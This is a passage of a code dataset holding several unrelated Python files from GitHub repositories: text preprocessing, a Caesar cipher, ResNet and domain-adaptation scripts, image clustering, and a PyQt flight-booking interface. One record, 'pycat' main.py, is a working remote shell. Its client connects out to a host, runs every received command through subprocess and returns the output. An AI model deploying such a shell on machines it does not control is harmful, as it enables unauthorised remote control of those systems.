v>1}\nwords = {k:v for k,v in words.items()}\n\n# Sorting the words according to the number of appearances, with the most common word being first\nwords = sorted(words, key=words.get, reverse=True)\n\n# Adding padding and unknown to our vocabulary so that they will be assigned an index\nwords = ['_PAD','_UNK'] + words\n\n# Dictionaries to store the word to index mappings and vice versa\nword2idx = {o:(i+1) for i,o in enumerate(words)}\nidx2word = {(i+1):o for i,o in enumerate(words)}\n\nfor i, sentence in enumerate(train_sentences):\n # Looking up the mapping dictionary and assigning the index to the respective words\n train_sentences[i] = [word2idx[word] if word in word2idx else 0 for word in sentence]\n\nfor i, sentence in enumerate(test_sentences):\n # For test sentences, we have to tokenize the sentences as well\n test_sentences[i] = [word2idx[word.lower()] if word.lower() in word2idx else 0 for word in nltk.word_tokenize(sentence)]\n\n# Defining a function that either shortens sentences or pads sentences with 0 to a fixed length\ndef pad_input(sentences, seq_len):\n features = np.zeros((len(sentences), seq_len),dtype=int)\n for ii, review in enumerate(sentences):\n if len(review) != 0:\n features[ii, -len(review):] = np.array(review)[:seq_len]\n return features\n\nseq_len = 300 # The length that the sentences will be padded/shortened to\n\ntrain_sentences = pad_input(train_sentences, seq_len)\ntest_sentences = pad_input(test_sentences, seq_len)\n\n# Converting our labels into numpy arrays\ntrain_labels = np.array(train_labels)\ntest_labels = np.array(test_labels)\n\nsplit_frac = 0.5 # 50% validation, 50% test\nsplit_id = int(split_frac * len(test_sentences))\nval_sentences, test_sentences = test_sentences[:split_id], test_sentences[split_id:]\nval_labels, test_labels = test_labels[:split_id], test_labels[split_id:]\n\npickle.dump(train_sentences, open(f'dataset/train_sentences.pkl', 'wb'))\npickle.dump(val_sentences, open(f'dataset/val_sentences.pkl', 'wb'))\npickle.dump(test_sentences, open(f'dataset/test_sentences.pkl', 'wb'))\npickle.dump(train_labels, open(f'dataset/train_labels.pkl', 'wb'))\npickle.dump(val_labels, open(f'dataset/val_labels.pkl', 'wb'))\npickle.dump(test_labels, open(f'dataset/test_labels.pkl', 'wb'))\n\npickle.dump(word2idx, open(f'dataset/word2idx.pkl', 'wb'))\npickle.dump(idx2word, open(f'dataset/idx2word.pkl', 'wb'))\n","repo_name":"urmisaha/NewsEmotion","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":6697,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"177997976","text":"from slicer import Slicer\n\n#My list data\ndata = [\n 200, 1230, 15, 2200, 5550\n]\n#2 is amount to split\ndata_slice = Slicer.cut(data, 2)\nprint(data_slice)\n\n\ndata = [\n {\n \"foodname\": \"Ayam Bakar\",\n \"price\": 12000\n }, \n {\n \"foodname\": \"Jus Mangga\",\n \"price\": 7000\n },\n {\n \"foodname\": \"Mie Goreng\",\n \"price\": 9000\n },\n {\n \"foodname\": \"Chicken Katsu\",\n \"price\": 15000\n },\n]\nprint(Slicer.cut(data, 2))","repo_name":"vkumarsk/pythonSplitData","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6073864571","text":"def check(num):\n if num==2 or num==3:\n return True\n if num==1 or num%2==0 or num%3==0:\n return False\n\n for i in range(3,num,2):\n if num%i==0:\n return False\n\n return True\n\nnum = int(input(\"Enter a number: \"))\n\nif check(num):\n print(\"Prime\")\nelse:\n print(\"Not Prime\")\n","repo_name":"Titan1911/Code-for-HacktoberFest-2021","sub_path":"Beginner/Python/primeOrNot.py","file_name":"primeOrNot.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"31"} +{"seq_id":"2301849815","text":"import os\nimport sys\nimport random\nimport socket\nimport platform\nimport subprocess\n\nos.system('')\n\narg = sys.argv\nBUFFER_SIZE = 1024 * 128\nSEPARATOR = \"\"\n\nif \"-r\" in arg:\n arg.remove(\"-r\")\n\n if len(arg) <= 1:\n print(\"[\\033[31mERRUER\\033[0m] Syntax error\\n$ python main.py -r :\\n\")\n else:\n SERVER_HOST = arg[1].split(':')[0]\n SERVER_PORT = int(arg[1].split(':')[1])\n BANNER = random.choice(open(\"D:/Bureau/pycat/banner.txt\", \"r\", encoding=\"utf8\").read().split(\"\\n\"))\n\n def banner_comman(cwd, user=os.getlogin(), OS=platform.system()) -> str:\n return f\"\\n\\033[1m\\033[96m┌──(\\033[1m\\033[94m{user}@{OS}\\033[1m\\033[96m)-[\\033[0m\\033[1m{cwd}\\033[96m]\\n\\033[1m\\033[96m└─\\033[1m\\033[94m$\\033[0m \"\n\n print(BANNER)\n print(\"[\\033[34mINFO\\033[0m] PYCAT by Game K\")\n s = socket.socket()\n s.bind((SERVER_HOST, SERVER_PORT))\n s.listen(5)\n print(f\"[\\033[33mWAIT\\033[0m] Listening as {SERVER_HOST}:{SERVER_PORT}\")\n client_socket, client_address = s.accept()\n print(f\"[\\033[32m OK \\033[0m] {client_address[0]}:{client_address[1]} Connected\")\n PID = client_socket.recv(BUFFER_SIZE).decode()\n client_socket.send(\"1\".encode(\"utf-8\"))\n cwd = client_socket.recv(BUFFER_SIZE).decode()\n\n while True:\n try:\n command = input(banner_comman(cwd))\n if not command.strip():\n continue\n client_socket.send(command.encode(\"utf-8\"))\n if command.lower() == \"exit\":\n break\n output = client_socket.recv(BUFFER_SIZE).decode(\"utf8\")\n results, cwd = output.split(SEPARATOR)\n print(results)\n except Exception as e:\n print(f\"[-] (SERVER) Error shell: {e}\")\n\nelif \"-c\" in arg:\n arg.remove(\"-c\")\n\n if len(arg) <= 1:\n print(\"[\\033[31mERRUER\\033[0m] Syntax error\\n$ python main.py -c :\\n\")\n else:\n SERVER_HOST = arg[1].split(':')[0]\n SERVER_PORT = int(arg[1].split(':')[1])\n PID = str(os.getpid())\n\n s = socket.socket()\n s.connect((SERVER_HOST, SERVER_PORT))\n s.send(PID.encode())\n while s.recv(BUFFER_SIZE).decode() != \"1\": pass\n cwd = os.getcwd()\n s.send(cwd.encode())\n\n while True:\n try:\n command = s.recv(BUFFER_SIZE).decode()\n splited_command = command.split()\n if command.lower() == \"exit\":\n break\n if splited_command[0].lower() == \"cd\":\n try:\n os.chdir(' '.join(splited_command[1:]))\n except FileNotFoundError as e:\n output = str(e)\n else:\n output = \"\"\n else:\n output = subprocess.getoutput(command)\n cwd = os.getcwd()\n message = f\"{output}{SEPARATOR}{cwd}\"\n s.send(message.encode())\n except Exception as e:\n s.send(f\"[-] (CLIENT) Error shell: {e}{SEPARATOR}{cwd}\".encode())\n s.close()\n\nelse:\n print(\"[\\033[31mERRUER\\033[0m] Syntax error\\n$ python main.py [-r|-c] :\\n\")\n","repo_name":"Game-K-Hack/pycat","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41799299960","text":"#!/usr/local/bin/python\n'''\nThis example processes a multi dimenstional list and display only negative numbers.\n\nKey concepts used:\nUses the filter() out only negative numbers\nUses apend() to add elements to list\nConverts a multi dimensional list to a single dimensional list using sum()\n\n'''\ndef display_neg(n):\n\n if n<0:\n return n\n\n\n\nl2d=[ [0,1,-1],[-4,1,6],[8,1,-1]]\nnegl=[]\nfor row in range(len(l2d)):\n negl.append(list(filter(display_neg,l2d[row])))\nprint (sum(negl, []))\n\n'''\noutput:\n[-1, -4, -1]\n'''\n","repo_name":"humanoid-endhiran/python-basics","sub_path":"list-negative.py","file_name":"list-negative.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70312865689","text":"### Reto #24: CIFRADO CÉSAR\n### Publicación: 12/06/23 | FÁCIL\n\n#Crea un programa que realize el cifrado César de un texto y lo imprima.\n#También debe ser capaz de descifrarlo cuando así se lo indiquemos.\n#\n#Te recomiendo que busques información para conocer en profundidad cómo realizar el cifrado. \n#Esto también forma parte del reto.\n\nimport random\n\nclass CeaseEncrypt:\n __displacement: int = 0\n __alphabet: list = list('ABCDEFGHIJKLMNÑOPQRSTUVWXYZ')\n __alphabet_encrypted: dict = dict()\n __alphabet_decrypted: dict = dict()\n\n def __init__(self, displacement: int = 0):\n if displacement == 0:\n self.__displacement = self.__get_random_displacement()\n else:\n alphabet_size = len(self.__alphabet)\n self.__displacement = 1 if displacement < 0 else alphabet_size if displacement > alphabet_size else displacement\n self.__encrypt_alphabet()\n\n def __get_random_displacement(self) -> int: \n return random.choice(range(len(self.__alphabet)))\n \n def displacement(self) -> int:\n return self.__displacement\n\n def __encrypt_alphabet(self) -> list():\n self.__alphabet_encrypted = dict()\n self.__alphabet_decrypted = dict()\n alphabet_size = len(self.__alphabet)\n for index in range(alphabet_size):\n new_index = index + self.__displacement\n key = self.__alphabet[index]\n if new_index < alphabet_size:\n value = self.__alphabet[new_index]\n else:\n value = self.__alphabet[new_index-alphabet_size]\n\n self.__alphabet_encrypted[key] = value\n self.__alphabet_decrypted[value] = key\n \n def encrypt(self, text: str) -> str:\n return self.__process(self.__alphabet_encrypted, text)\n\n def decrypt(self, text: str) -> str:\n return self.__process(self.__alphabet_decrypted, text)\n\n def __process(self, alphabet: dict, text: str) -> str:\n result = list()\n for letter in text.upper():\n letter_encrypted = alphabet.get(letter)\n result.append(letter_encrypted if letter_encrypted is not None else letter)\n return \"\".join(result)\n\n\nif __name__ == '__main__':\n print('Reto #24: CIFRADO CÉSAR')\n print('Publicación: 12/06/23 | FÁCIL\\n')\n\n # prueba con un desplazamiento random\n text = \"El mañana nunca muere\"\n ceaseEncrypt = CeaseEncrypt()\n displacement = ceaseEncrypt.displacement()\n text_encrypted = ceaseEncrypt.encrypt(text)\n print(text_encrypted)\n text_decrypted = ceaseEncrypt.decrypt(text_encrypted)\n print(text_decrypted)\n\n print()\n\n # prueba con un desplazamiento especifico\n ceaseEncrypt = CeaseEncrypt(displacement)\n text_encrypted = ceaseEncrypt.encrypt(text)\n print(text_encrypted)\n text_decrypted = ceaseEncrypt.decrypt(text_encrypted)\n print(text_decrypted)\n","repo_name":"gwf-training/python-retos-semanales","sub_path":"src/retos-2023/24-cifrado-cesar.py","file_name":"24-cifrado-cesar.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71421837208","text":"import torch\nimport torch.nn as nn\nfrom torch.nn import functional as F\n\nclass BasicBlock(nn.Module):\n def __init__(self, in_planes, planes, stride=1):\n super(BasicBlock, self).__init__()\n self.conv1 = nn.Sequential(\n nn.Conv2d(in_channels=in_planes, out_channels=planes, kernel_size=3, stride=stride, padding=1, bias=False),\n nn.BatchNorm2d(planes),\n nn.ReLU()\n )\n\n self.conv2 = nn.Sequential(\n nn.Conv2d(in_channels=planes, out_channels=planes, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(planes)\n )\n\n if stride != 1 or in_planes != planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, planes, kernel_size=1, stride=stride),\n nn.BatchNorm2d(planes)\n )\n else:\n self.shortcut = nn.Sequential()\n\n def forward(self, x):\n out = self.conv1(x)\n out = self.conv2(out)\n # print(out.shape)\n # print(self.shortcut(x).shape)\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\nclass ResNet18(nn.Module):\n def __init__(self):\n block = BasicBlock\n num_block = [2, 2, 2, 2]\n super(ResNet18, self).__init__()\n self.in_planes = 64\n self.conv1 = nn.Conv2d(4, 64, kernel_size=7, stride=2, padding=3, bias=False)\n self.bn1 = nn.BatchNorm2d(64)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1) # the first layer\n\n self.layer1 = self._make_layer(block, 64, num_block[0], stride=1) # four layers 2-5\n self.layer2 = self._make_layer(block, 128, num_block[1], stride=2) # four layers 6-9\n self.layer3 = self._make_layer(block, 256, num_block[2], stride=2) # four layers 10-13\n self.layer4 = self._make_layer(block, 512, num_block[3], stride=2) # four layers 14-17\n \n self.fc = nn.Linear(512, 10) # the last layer\n\n def _make_layer(self, block, planes, num_blocks, stride): \n layers = []\n for i in range(num_blocks):\n if i == 0:\n layers.append(block(self.in_planes, planes, stride))\n else:\n layers.append(block(planes, planes, 1))\n\n self.in_planes = planes \n return nn.Sequential(*layers)\n\n def forward(self, x):\n x = self.maxpool(self.relu(self.bn1(self.conv1(x))))\n # print(\"con1\",x.shape)\n x = self.layer1(x)\n # print(\"layer1\",x.shape)\n x = self.layer2(x)\n # print(\"layer2\",x.shape)\n x = self.layer3(x)\n # print(\"layer3\",x.shape)\n x = self.layer4(x)\n # print(\"layer4\",x.shape)\n x = F.avg_pool2d(x,7)\n x = x.view(x.size(0), -1)\n # x = self.fc(x)\n out = x\n return out\n\nif __name__ == \"__main__\":\n # test resnet\n Res = ResNet18()\n img = torch.zeros((224,224,4))\n img = img.unsqueeze(0).permute(0,3,1,2)\n img = Res(img)\n print(img.shape)\n\n","repo_name":"runyuma/RA","sub_path":"agents/Resnet_backup.py","file_name":"Resnet_backup.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8795614637","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# 과일 사진 데이터 로드\nfruits = np.load(\"fruits_300.npy\")\n\nprint(fruits.shape)\nprint(fruits[0, 0, :])\n\n# 0 ~ 255 Grayscale 색상의 100*100 크기의 배열 사진 300개\nplt.imshow(fruits[0], cmap=\"gray_r\")\nplt.show()\n\nfig, axs = plt.subplots(1, 2)\naxs[0].imshow(fruits[100], cmap=\"gray_r\")\naxs[1].imshow(fruits[200], cmap=\"gray_r\")\nplt.show()\n\n# 2차원 배열 형태의 사진 데이터를 1차원 배열 형태로 전환\napple = fruits[:100].reshape(-1, 100 * 100)\npineapple = fruits[100:200].reshape(-1, 100 * 100)\nbanana = fruits[200:300].reshape(-1, 100 * 100)\n\nprint(apple.shape)\nprint(apple.mean(axis=1))\n\n# 데이터 분류 별 픽셀 색상 데이터 평균 히스토그램\nplt.hist(np.mean(apple, axis=1), alpha=0.8)\nplt.hist(np.mean(pineapple, axis=1), alpha=0.8)\nplt.hist(np.mean(banana, axis=1), alpha=0.8)\nplt.legend([\"apple\", \"pineapple\", \"banana\"])\nplt.show()\n\nfig, axs = plt.subplots(1, 3, figsize=(20, 5))\naxs[0].bar(range(10000), np.mean(apple, axis=0))\naxs[1].bar(range(10000), np.mean(pineapple, axis=0))\naxs[2].bar(range(10000), np.mean(banana, axis=0))\nplt.show()\n\n# 각 분류 별 100장의 픽셀 각각의 평균값을 가지는 이미지\napple_mean = np.mean(apple, axis=0).reshape(100, 100)\npineapple_mean = np.mean(pineapple, axis=0).reshape(100, 100)\nbanana_mean = np.mean(banana, axis=0).reshape(100, 100)\n\nfig, axs = plt.subplots(1, 3, figsize=(20, 5))\naxs[0].imshow(apple_mean, cmap=\"gray_r\")\naxs[1].imshow(pineapple_mean, cmap=\"gray_r\")\naxs[2].imshow(banana_mean, cmap=\"gray_r\")\nplt.show()\n\n# 각 분류 별 클래스의 평균값과 가까운 값을 가지는 사진 선택 (사과의 경우)\nabs_diff = np.abs(fruits - apple_mean)\nabs_mean = np.mean(abs_diff, axis=(1, 2))\nprint(abs_mean.shape)\n\napple_index = np.argsort(abs_mean)[:100]\nfig, axs = plt.subplots(10, 10, figsize=(10, 10))\n\nfor i in range(10):\n for j in range(10):\n axs[i, j].imshow(fruits[apple_index[i * 10 + j]], cmap=\"gray_r\")\n axs[i, j].axis(\"off\")\n\nplt.show()\n","repo_name":"JaeyoonCheon/MLDL-training","sub_path":"6-1.Clustering.py","file_name":"6-1.Clustering.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"406774406","text":"import torch\nfrom torch.utils.data import DataLoader\nimport os\nimport sys\nimport glob\nimport numpy as np\nimport pandas as pd\nfrom dann_model import DANN\nfrom dann_dataset import DannDataset\nfrom sklearn.manifold import TSNE\nfrom matplotlib import pyplot as plt\n\nsource = sys.argv[1]\ntarget = ''\nif source == 'mnistm':\n target = 'svhn'\nelif source == 'usps':\n target = 'mnistm'\nelif source == 'svhn':\n target = 'usps'\n\nfile_root = '../hw3_data/digits'\n\nmodel = DANN()\nif target == 'mnistm':\n model.load_state_dict(torch.load('../models/usps_mnistm.pth', map_location='cpu'))\nelif target == 'usps':\n model.load_state_dict(torch.load('../models/svhn_usps.pth', map_location='cpu'))\nelif target == 'svhn':\n model.load_state_dict(torch.load('../models/mnistm_svhn.pth', map_location='cpu'))\n\n#source_dataset = DannDataset(root=file_root, dataset=source, train=False)\n#source_loader = DataLoader(source_dataset, batch_size=200, shuffle=False, num_workers=1)\ntarget_dataset = DannDataset(root=file_root, dataset=target, train=False)\ntarget_loader = DataLoader(target_dataset, batch_size=200, shuffle=False, num_workers=1)\n\nmodel.eval()\nfeature_extracter = model.feature\nfc = model.class_classifier\nn_correct = 0\nwith torch.no_grad():\n for _, (t_img, t_label) in enumerate(target_loader):\n t_img, t_label = t_img, t_label\n f = feature_extracter(t_img).view(-1, 48*4*4)\n class_output = fc(f)\n pred = torch.max(class_output.data, 1)\n n_correct += (pred[1] == t_label).sum().item()\n\naccu = float(n_correct) / len(target_loader.dataset) * 100\nprint(accu)\n\n\n\noutput = np.empty(shape=[0, 48*4*4])\nclass_label = np.empty(shape=[0, 1])\n'''\nfor _, (t_img, t_label) in enumerate(source_loader):\n f = feature_extracter(t_img).view(-1, 48*4*4)\n f = np.array(f.detach())\n output = np.append(output, f, axis=0)\n t_label = np.array(t_label)\n t_label = t_label.astype(int)\n class_label = np.append(class_label, t_label)\n\nn_correct = 0\nfor _, (t_img, t_label) in enumerate(target_loader):\n f = feature_extracter(t_img).view(-1, 48*4*4)\n f = np.array(f.detach())\n output = np.append(output, f, axis=0)\n t_label = np.array(t_label)\n t_label = t_label.astype(int)\n class_label = np.append(class_label, t_label)\n\n\ndomain_label = np.zeros((len(source_loader.dataset)))\ndomain_label = np.append(domain_label, np.ones((len(target_loader.dataset))))\ndomain_label = domain_label.astype(int)\n\ntsne = TSNE(n_components=2, random_state=0)\nX_2d = tsne.fit_transform(output)\n\n\ntarget_names = np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\ntarget_ids = range(len(target_names))\n\nplt.figure(figsize=(6, 5))\ncolors = ['r', 'g', 'b', 'c', 'm', 'y', 'k', 'grey', 'orange', 'purple']\nfor i, c, label in zip(target_ids, colors, target_names):\n plt.scatter(X_2d[class_label == i, 0], X_2d[class_label == i, 1], c=c, label=label)\nplt.legend()\nprint('done')\nplt.show()\n\ntarget_names = np.array(['source domain', 'target domain'])\ntarget_ids = range(len(target_names))\n\nplt.figure(figsize=(6, 5))\ncolors = ['r', 'b']\nfor i, c, label in zip(target_ids, colors, target_names):\n plt.scatter(X_2d[domain_label == i, 0], X_2d[domain_label == i, 1], c=c, label=label)\nplt.legend()\nprint('done')\nplt.show()\n'''\n'''\nfrom sklearn import datasets\ndigits = datasets.load_digits()\n# Take the first 500 data points: it's hard to see 1500 points\nX = digits.data[:10]\ny = digits.target[:10]\n\n############################################################\n# Fit and transform with a TSNE\nfrom sklearn.manifold import TSNE\ntsne = TSNE(n_components=2, random_state=0)\n\n############################################################\n# Project the data in 2D\nX_2d = tsne.fit_transform(X)\n\n############################################################\n# Visualize the data\ntarget_ids = range(len(digits.target_names))\nprint(type(digits.target_names))\n\nfrom matplotlib import pyplot as plt\nplt.figure(figsize=(6, 5))\ncolors = 'r', 'g', 'b', 'c', 'm', 'y', 'k', 'w', 'orange', 'purple'\nfor i, c, label in zip(target_ids, colors, digits.target_names):\n plt.scatter(X_2d[y == i, 0], X_2d[y == i, 1], c=c, label=label)\nplt.legend()\nplt.show()\n\n'''","repo_name":"kkeen699/DLCV-spring2019","sub_path":"hw3/DANN/t-SNE.py","file_name":"t-SNE.py","file_ext":"py","file_size_in_byte":4161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28010561880","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtCore import QPropertyAnimation\nfrom .menu_klient import Menu_klient\nfrom .menu_lotniska import Ui_dodawani_lotniska\nfrom .menu_samoloty import menu_samoloty\nfrom .menu_trasy import Ui_menu_trasy\nfrom .menu_loty import Ui_menuloty\nfrom .menu_rezerwacja import menu_rezerwacja\nfrom .menu_usuwanie import Ui_usuwanie\nfrom .info_zapis import Ui_Dialog_2\nfrom .info_odczyt import Ui_Dialog\n\n\n\nclass Ui_System_rezerwacji_biletow(object):\n def __init__(self,system):\n self.system=system\n def setupUi(self, System_rezerwacji_biletow):\n System_rezerwacji_biletow.setObjectName(\"System_rezerwacji_biletow\")\n System_rezerwacji_biletow.resize(1200, 600)\n\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(\"modules/ikony/plane.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n System_rezerwacji_biletow.setWindowIcon(icon)\n\n System_rezerwacji_biletow.setStyleSheet(\"background-color: rgb(53, 53, 53);\")\n self.glowny = QtWidgets.QWidget(System_rezerwacji_biletow)\n self.glowny.setMinimumSize(QtCore.QSize(800, 600))\n self.glowny.setObjectName(\"glowny\")\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.glowny)\n self.horizontalLayout.setContentsMargins(2, 2, 2, 2)\n self.horizontalLayout.setSpacing(0)\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n\n\n\n self.lewa_ramka = QtWidgets.QFrame(self.glowny)\n self.lewa_ramka.setMaximumSize(QtCore.QSize(400, 16777215))\n self.lewa_ramka.setMinimumSize(QtCore.QSize(400,0))\n self.lewa_ramka.setStyleSheet(\"background-color: rgb(83, 83, 83);border-radius:5px;\")\n self.lewa_ramka.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.lewa_ramka.setFrameShadow(QtWidgets.QFrame.Raised)\n self.lewa_ramka.setObjectName(\"lewa_ramka\")\n\n\n\n self.verticalLayout = QtWidgets.QVBoxLayout(self.lewa_ramka)\n self.verticalLayout.setContentsMargins(5, 5, 5, 5)\n self.verticalLayout.setSpacing(2)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n\n self.lewo_gora_ramka = QtWidgets.QFrame(self.lewa_ramka)\n self.lewo_gora_ramka.setMaximumSize(QtCore.QSize(16777215, 64))\n self.lewo_gora_ramka.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.lewo_gora_ramka.setFrameShadow(QtWidgets.QFrame.Raised)\n self.lewo_gora_ramka.setObjectName(\"lewo_dol_ramka\")\n self.lewo_gora_ramka.setStyleSheet(\"background-color: rgb(83, 83, 83);\")\n self.verticalLayout .addWidget(self.lewo_gora_ramka)\n self.verticalLayout_gora = QtWidgets.QVBoxLayout(self.lewo_gora_ramka)\n self.verticalLayout_gora.setContentsMargins(0,0,0,0)\n self.verticalLayout_gora.setSpacing(0)\n\n self.przycisk_wysun = QtWidgets.QPushButton(self.lewo_gora_ramka)\n self.przycisk_wysun.setMinimumSize(0,60)\n self.przycisk_wysun.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(53, 53,53);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n self.przycisk_wysun.setIcon(QtGui.QIcon(\"modules/ikony/menu.png\"))\n self.przycisk_wysun.setIconSize(QtCore.QSize(40,40))\n self.przycisk_wysun.clicked.connect(self.animacja)\n self.verticalLayout_gora.addWidget(self.przycisk_wysun)\n #self.przycisk_wysun\n\n\n\n self.przycisk_klienci = QtWidgets.QPushButton(self.lewa_ramka)\n self.przycisk_klienci.setMinimumSize(QtCore.QSize(0, 90))\n self.przycisk_klienci.setIcon(QtGui.QIcon(\"modules/ikony/klienci.png\"))\n self.przycisk_klienci.setIconSize(QtCore.QSize(40,40))\n font = QtGui.QFont()\n font.setFamily(\"Segoe UI\")\n font.setPointSizeF(18)\n self.przycisk_klienci.setFont(font)\n self.przycisk_klienci.setStyleSheet(\"background-color: rgb(53,53,53);\")\n self.przycisk_klienci.setObjectName(\"przycisk_klienci\")\n self.verticalLayout.addWidget(self.przycisk_klienci)\n self.przycisk_klienci.clicked.connect(self.przycisk_klienci_click)\n self.przycisk_klienci.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(53, 53,53);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n\n\n self.przycisk_samoloty = QtWidgets.QPushButton(self.lewa_ramka)\n self.przycisk_samoloty.setMinimumSize(QtCore.QSize(0, 90))\n self.przycisk_samoloty.setIcon(QtGui.QIcon(\"modules/ikony/samolot.ico\"))\n self.przycisk_samoloty.setIconSize(QtCore.QSize(40,40))\n font = QtGui.QFont()\n font.setPointSizeF(18)\n font.setFamily(\"Arial\")\n self.przycisk_samoloty.setFont(font)\n self.przycisk_samoloty.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.przycisk_samoloty.setObjectName(\"przycisk_samoloty\")\n self.verticalLayout.addWidget(self.przycisk_samoloty)\n self.przycisk_samoloty.clicked.connect(self.przycisk_samoloty_click)\n self.przycisk_samoloty.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(53,53,53);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n\n #123123\n\n self.przysick_trasy = QtWidgets.QPushButton(self.lewa_ramka)\n self.przysick_trasy.setMinimumSize(QtCore.QSize(0, 90))\n self.przysick_trasy.setIcon(QtGui.QIcon(\"modules/ikony/trasa.png\"))\n self.przysick_trasy.setIconSize(QtCore.QSize(40,40))\n font = QtGui.QFont()\n font.setPointSizeF(18)\n font.setFamily(\"Arial\")\n self.przysick_trasy.setFont(font)\n self.przysick_trasy.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.przysick_trasy.setObjectName(\"przysick_trasy\")\n self.verticalLayout.addWidget(self.przysick_trasy)\n self.przysick_trasy.clicked.connect(self.przycisk_trasy_click)\n self.przysick_trasy.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(53,53,53);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n\n\n\n self.przycisk_lotniska = QtWidgets.QPushButton(self.lewa_ramka)\n self.przycisk_lotniska.setMinimumSize(QtCore.QSize(0, 90))\n self.przycisk_lotniska.setIcon(QtGui.QIcon(\"modules/ikony/lotnisko.png\"))\n self.przycisk_lotniska.setIconSize(QtCore.QSize(40,40))\n font = QtGui.QFont()\n font.setPointSizeF(18)\n font.setFamily(\"Arial\")\n self.przycisk_lotniska.setFont(font)\n self.przycisk_lotniska.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.przycisk_lotniska.setObjectName(\"przycisk_lotniska\")\n self.verticalLayout.addWidget(self.przycisk_lotniska)\n self.przycisk_lotniska.clicked.connect(self.przycisk_lotniska_click)\n self.przycisk_lotniska.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(53,53,53);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n\n\n\n self.przycisk_loty = QtWidgets.QPushButton(self.lewa_ramka)\n self.przycisk_loty.setMinimumSize(QtCore.QSize(0, 90))\n self.przycisk_loty.setIcon(QtGui.QIcon(\"modules/ikony/lot.png\"))\n self.przycisk_loty.setIconSize(QtCore.QSize(40,40))\n font = QtGui.QFont()\n font.setPointSizeF(18)\n font.setFamily(\"Arial\")\n self.przycisk_loty.setFont(font)\n self.przycisk_loty.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.przycisk_loty.setObjectName(\"przycisk_loty\")\n self.verticalLayout.addWidget(self.przycisk_loty)\n self.przycisk_loty.clicked.connect(self.przycisk_loty_click)\n\n self.przycisk_loty.setStyleSheet(\"QPushButton{\\nbackground-color: rgb(53,53,53);border:none;color:rgb(255,255,255);\\n}\\nQPushButton:hover{\\ncolor:rgb(0,0,0);background-color: rgb(255, 170, 0);\\n}\")\n\n\n\n\n\n self.lewo_dol_ramka = QtWidgets.QFrame(self.lewa_ramka)\n self.lewo_dol_ramka.setMaximumSize(QtCore.QSize(16777215, 60))\n self.lewo_dol_ramka.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.lewo_dol_ramka.setFrameShadow(QtWidgets.QFrame.Raised)\n self.lewo_dol_ramka.setObjectName(\"lewo_dol_ramka\")\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.lewo_dol_ramka)\n\n\n\n self.horizontalLayout_2.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout_2.setSpacing(2)\n self.horizontalLayout_2.setObjectName(\"horizontalLayout_2\")\n self.przycisk_zapis = QtWidgets.QPushButton(self.lewo_dol_ramka)\n self.przycisk_zapis.setMinimumSize(QtCore.QSize(0, 60))\n font = QtGui.QFont()\n font.setPointSizeF(18)\n font.setFamily(\"Arial\")\n self.przycisk_zapis.setFont(font)\n self.przycisk_zapis.setStyleSheet(\"background-color: rgb(217, 217, 217);\")\n self.przycisk_zapis.setObjectName(\"przycisk_zapis\")\n self.przycisk_zapis.clicked.connect(self.przycisk_zapis_click)\n 